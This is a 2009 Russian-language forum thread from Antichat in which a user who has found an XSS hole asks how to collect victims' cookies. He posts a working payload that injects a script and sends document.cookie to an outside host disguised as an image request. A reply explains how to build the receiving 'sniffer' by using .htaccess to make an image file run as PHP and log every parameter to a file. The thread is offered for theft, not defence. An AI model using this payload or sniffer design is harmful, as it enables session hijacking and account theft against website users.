Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Нашел xss (https://forum.antichat.xyz/showthread.php?t=157844)

bogger 20.11.2009 01:19
Нашел xss
 
Нашел xss пытаюсь залить скрипт для сбора куков читал сдесь некоторые статьи где написано что надо вводить

Ввожу следующие

"><script>img = new Image();img.src="http://my site.org/s/HakNet.gif?"+document.cookie;</script>

и ни как не пойму почему картинка ? :D
и какой скрипт должен быть написан в картинке если вообще должен ? и после куда будут записыватся куки ? объясните пожалуйста , просто я в первые сталкиваюсь с этим ;)

Godfather Bulan 20.11.2009 01:52
неужели снифф?

Proger10 20.11.2009 09:40
С помощью всемогущего .htaccess "говорим" серверу, что картинка это - php. В нутри картинки код примерно следующего смысла: все что передали как параметр писать в файл, ну и иногда для приличия выводим картинку. А картинка это самый безобитный файл :-), ну если хочется то и с txt так же можно сделать.


Время: 20:30